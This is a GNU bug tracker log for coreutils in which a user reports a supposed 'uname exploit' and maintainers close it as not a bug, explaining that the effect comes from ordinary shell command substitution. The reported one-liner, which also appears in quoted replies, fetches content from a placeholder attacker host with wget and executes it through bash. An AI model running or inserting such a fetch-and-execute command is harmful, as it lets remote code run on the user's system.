GNU bug report logs - #24328
uname exploit

Previous Next

Package: coreutils;

Reported by: Shane <linuxshane <at> gmail.com>

Date: Mon, 29 Aug 2016 15:28:01 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

To add a comment to this bug, you must first unarchive it, by sending
a message to control AT debbugs.gnu.org, with unarchive 24328 in the body.
You can then email your comments to 24328 AT debbugs.gnu.org in the normal way.

Toggle the display of automated, internal messages from the tracker.

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to bug-coreutils <at> gnu.org:
bug#24328; Package coreutils. (Mon, 29 Aug 2016 15:28:01 GMT) Full text and rfc822 format available.
Acknowledgement sent to Shane <linuxshane <at> gmail.com>:
New bug report received and forwarded. Copy sent to bug-coreutils <at> gnu.org. (Mon, 29 Aug 2016 15:28:02 GMT) Full text and rfc822 format available.

Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):

From: Shane <linuxshane <at> gmail.com>
To: bug-coreutils <at> gnu.org
Subject: uname exploit
Date: Mon, 29 Aug 2016 02:25:03 -0500

Hi, I am unsure if you have seen this, but I am concerned about this - 
can or should uname be restricted to root use only?

uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
Information forwarded to bug-coreutils <at> gnu.org:
bug#24328; Package coreutils. (Mon, 29 Aug 2016 15:50:02 GMT) Full text and rfc822 format available.

Message #8 received at submit <at> debbugs.gnu.org (full text, mbox):

From: Evan J Johnson <e <at> ejj.io>
To: bug-coreutils <at> gnu.org
Subject: Re: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:47:22 -0700

Hey Shane,

I'm no bash/systems/coreutils expert, but I believe this behavior is
completely expected, independent of uname, and documented.

$(...) is the command substitution syntax and it will cause the command
inside the parens to be run, with the output used as input. Here's a
link to the behavior on gnu.org.
https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution

It won't work if you use single quotes, which is also expected.

Evan

On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote:
> Hi, I am unsure if you have seen this, but I am concerned about this - 
> can or should uname be restricted to root use only?
> 
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
> 
> 
> 
> 
>
Reply sent to Paul Eggert <eggert <at> cs.ucla.edu>:
You have taken responsibility. (Mon, 29 Aug 2016 15:59:02 GMT) Full text and rfc822 format available.
Notification sent to Shane <linuxshane <at> gmail.com>:
bug acknowledged by developer. (Mon, 29 Aug 2016 15:59:02 GMT) Full text and rfc822 format available.

Message #13 received at 24328-done <at> debbugs.gnu.org (full text, mbox):

From: Paul Eggert <eggert <at> cs.ucla.edu>
To: Shane <linuxshane <at> gmail.com>, 24328-done <at> debbugs.gnu.org
Subject: Re: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:58:40 -0700

Shane wrote:
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"

I don't see a bug here, so I'm marking this as done.
bug archived. Request was from Debbugs Internal Request <help-debbugs <at> gnu.org> to internal_control <at> debbugs.gnu.org. (Tue, 27 Sep 2016 11:24:03 GMT) Full text and rfc822 format available.
This bug report was last modified 8 years and 328 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.